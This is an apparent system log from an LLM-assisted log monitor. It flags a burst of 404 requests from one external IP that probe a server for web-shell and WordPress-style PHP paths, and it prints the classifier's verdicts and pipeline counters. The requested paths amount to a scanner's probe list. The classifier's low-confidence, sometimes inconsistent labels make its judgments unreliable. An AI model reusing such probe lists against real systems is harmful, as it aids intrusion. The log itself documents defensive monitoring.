Mar 20 12:53:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:41.052084 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access log shows a request to a random PHP file (8573.php) returning 404, which can indicate automated probing or vulnerability scanning. Line=2026-03-20T12:46:06.647735101Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /8573.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:53:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:47.159611 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:53:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:47.159647 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a suspicious path bolt.php suggests a potential probing or exploit attempt against a CMS-like endpoint. Line=2026-03-20T12:46:06.713731239Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /bolt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:53:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:55.161558 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:53:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:55.161595 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a likely PHP file (/tfm.php) from an external IP; could indicate probing for vulnerable or misconfigured scripts. Line=2026-03-20T12:46:06.780650571Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /tfm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:01.955504 [observer] Pipeline: processed=5348 pattern_hits=5165 llm_calls=183 llm_errors=3 learned=3
Mar 20 12:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:01.955640 [observer] Patterns: hash=5165 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=183
Mar 20 12:54:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:02.518371 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:54:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:02.518418 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:54:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:12.825810 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:54:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:12.825854 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a WordPress admin CSS path from a container service suggests probing for admin endpoints; not definitive malicious activity but merits alerts. Line=2026-03-20T12:46:06.913995151Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wp-admin/css/bolt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:54:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:19.541479 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:54:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:19.541532 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file (nw.php) in a single request could indicate probing or misconfiguration; not a definitive attack but warrant attention. Line=2026-03-20T12:46:06.980502764Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET //nw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:31.934794 [observer] Pipeline: processed=5355 pattern_hits=5169 llm_calls=186 llm_errors=3 learned=3
Mar 20 12:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:31.934824 [observer] Patterns: hash=5169 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=186
Mar 20 12:54:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:35.340290 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type=
Mar 20 12:54:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:35.340327 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /bnm.php returned 404, which can indicate probing for vulnerable/php info endpoints. Not clearly malicious but warrants monitoring. Line=2026-03-20T12:46:07.049874567Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /bnm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:54:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:42.544760 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:54:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:42.544792 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for /nw.php returning 404 could indicate probing or attempted access to hidden/admin resources; not definitive malicious activity but warrants attention. Line=2026-03-20T12:46:07.116681355Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /nw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:54:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:52.411530 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:54:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:52.411570 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /s.php from external IP suggests probing or a web resource lookup pattern common in vulnerability scans. Line=2026-03-20T12:46:07.187090833Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /s.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:00.431992 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:55:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:00.432029 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a possibly targeted PHP file (hplfuns.php) from an internal host with an external IP in the log tail suggests probing for vulnerable scripts. Line=2026-03-20T12:46:07.261350601Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /hplfuns.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:01.973277 [observer] Pipeline: processed=5361 pattern_hits=5171 llm_calls=190 llm_errors=3 learned=3
Mar 20 12:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:01.973314 [observer] Patterns: hash=5171 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=190
Mar 20 12:55:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:04.581374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 12:55:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:04.581412 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to /jp.php returning 404 can indicate automated probing for known web shells or vulnerable scripts; not definitive but warrants attention. Line=2026-03-20T12:46:07.327053422Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /jp.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:13.363111 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:55:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:13.363148 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single 404 for /xsas.php suggests a targeted probe for a potentially sensitive PHP file. Line=2026-03-20T12:46:07.407178121Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /xsas.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:19.999297 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:55:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:19.999334 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file (potentially probing for vulnerable scripts) returning 404, a common indicator of automated scans. Line=2026-03-20T12:46:07.514630316Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /5b9ac.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:30.246413 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:55:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:30.246443 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /okxh.php returning 404 suggests probing for PHP file or misconfigured path; could be automated scanning. Line=2026-03-20T12:46:07.581497469Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /okxh.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:31.934722 [observer] Pipeline: processed=5369 pattern_hits=5175 llm_calls=194 llm_errors=3 learned=3
Mar 20 12:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:31.934748 [observer] Patterns: hash=5175 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=194
Mar 20 12:55:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:35.806215 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 12:55:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:35.806280 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=The log shows a 404 for a request to a suspicious PHP file (rzki.php) from a client IP, which can indicate probing or potential vulnerability scanning. Line=2026-03-20T12:46:07.648369706Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /rzki.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:44.673309 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:55:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:44.673350 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for a common sensitive path (edit.php) returning 404 suggests probing or targeted scanning activity rather than normal user traffic. Line=2026-03-20T12:46:07.724044225Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /edit.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:55:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:51.116368 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:55:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:51.116402 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 12:55:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:57.823541 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:55:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:57.823583 [analyzer] Source hint mismatch: LLM says "web_server", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:01.979703 [observer] Pipeline: processed=5375 pattern_hits=5177 llm_calls=198 llm_errors=3 learned=3
Mar 20 12:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:01.981082 [observer] Patterns: hash=5177 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=198
Mar 20 12:56:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:04.498594 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:56:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:04.498693 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /66.php from an external IP to the service, with internal client IP present; could indicate probing or accidental hit rather than normal usage. Line=2026-03-20T12:46:08.038687789Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /66.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:56:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:14.198845 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=regex
Mar 20 12:56:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:14.198879 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:56:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:19.004665 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:56:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:19.004702 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a specific PHP file path (ioxi-o.php) from an external IP; potential probing or misconfigured route, not clearly malicious but warrants monitoring Line=2026-03-20T12:46:08.180192504Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ioxi-o.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:56:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:28.628016 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=contains
Mar 20 12:56:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:28.628055 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:31.937085 [observer] Pipeline: processed=5382 pattern_hits=5180 llm_calls=202 llm_errors=3 learned=3
Mar 20 12:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:31.937109 [observer] Patterns: hash=5180 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=202
Mar 20 12:56:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:37.017095 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:56:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:37.017265 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /sid3.php with 404 indicates a potential probe or misconfigured path. Line=2026-03-20T12:46:08.338216700Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /sid3.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:56:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:43.330680 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:56:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:43.330728 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /d12.php resulting in 404; may indicate probing for PHP files or common exploits. Line=2026-03-20T12:46:08.436617947Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /d12.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:56:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:49.850705 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:56:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:49.850742 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:56:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:56.601998 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type=
Mar 20 12:56:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:56.602030 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 to wp-blog-header.php suggests probing for WordPress headers; could be automated scanner activity. Line=2026-03-20T12:46:08.575868527Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /wp-blog-header.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:01.975381 [observer] Pipeline: processed=5390 pattern_hits=5184 llm_calls=206 llm_errors=3 learned=3
Mar 20 12:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:01.975555 [observer] Patterns: hash=5184 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=206
Mar 20 12:57:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:03.443656 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:03.443705 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /abc.php from client IPs suggests probing for common vulnerable files; not definitively malicious but warrants scrutiny. Line=2026-03-20T12:46:08.663007802Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /abc.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:12.326962 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:12.327000 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file path (55b76.php) can indicate probing or attempted access to potentially vulnerable scripts. Line=2026-03-20T12:46:08.734529684Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /55b76.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:19.947744 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:19.947789 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a potential admin path (admin-footer.php) returning 404 suggests probing for admin endpoints. Not definitively malicious but warrants scrutiny. Line=2026-03-20T12:46:08.800692680Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /admin-footer.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:30.183792 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix
Mar 20 12:57:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:30.183829 [analyzer] Source hint mismatch: LLM says "nginx/apache access log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:31.935556 [observer] Pipeline: processed=5396 pattern_hits=5186 llm_calls=210 llm_errors=3 learned=3
Mar 20 12:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:31.935579 [observer] Patterns: hash=5186 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=210
Mar 20 12:57:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:34.353348 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:34.353388 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a likely probe path (ccs.php) returning 404 could indicate scripted scanning or probing activity. Line=2026-03-20T12:46:08.933007933Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ccs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:39.555857 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:39.555888 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to a PHP file returning 404 can indicate probing for resources or misconfigured assets; not definitively malicious but warrants monitoring. Line=2026-03-20T12:46:08.999329412Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ws83.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:45.176916 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 12:57:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:45.176950 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Unusual access to inputs.php resulting in 404 may indicate probing for vulnerable PHP endpoints; pattern not anchored, but notable due to the requested path. Line=2026-03-20T12:46:09.235608274Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /inputs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:57:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:51.888940 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:57:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:51.888982 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:57:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:58.208904 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:57:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:58.208941 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file path from an external client can indicate probing or automated vulnerability scans. Line=2026-03-20T12:46:09.368371007Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /a5e0a.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.739196 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.739233 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /lib.php with external IP in request pattern commonly seen in probing or vulnerability scans. Line=2026-03-20T12:46:09.434585616Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /lib.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.956761 [observer] Pipeline: processed=5406 pattern_hits=5190 llm_calls=216 llm_errors=3 learned=3
Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.956794 [observer] Patterns: hash=5190 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=216
Mar 20 12:58:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:06.485096 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 12:58:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:06.485313 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to gfd.php returning 404 suggests probing for vulnerable PHP file paths. Could be scanner activity. Line=2026-03-20T12:46:09.500627318Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /gfd.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:11.829608 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:58:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:11.829651 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:58:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:16.724542 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 12:58:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:16.724583 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 response for a common PHP file (domains.php) could indicate probing or misconfiguration; not clearly malicious but warrants monitoring. Line=2026-03-20T12:46:09.674332333Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /domains.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:21.487125 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:21.487183 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a potentially probing path (byypas.php) from an external IP; unusual access pattern but not definitive malicious activity yet. Line=2026-03-20T12:46:09.740851342Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /byypas.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
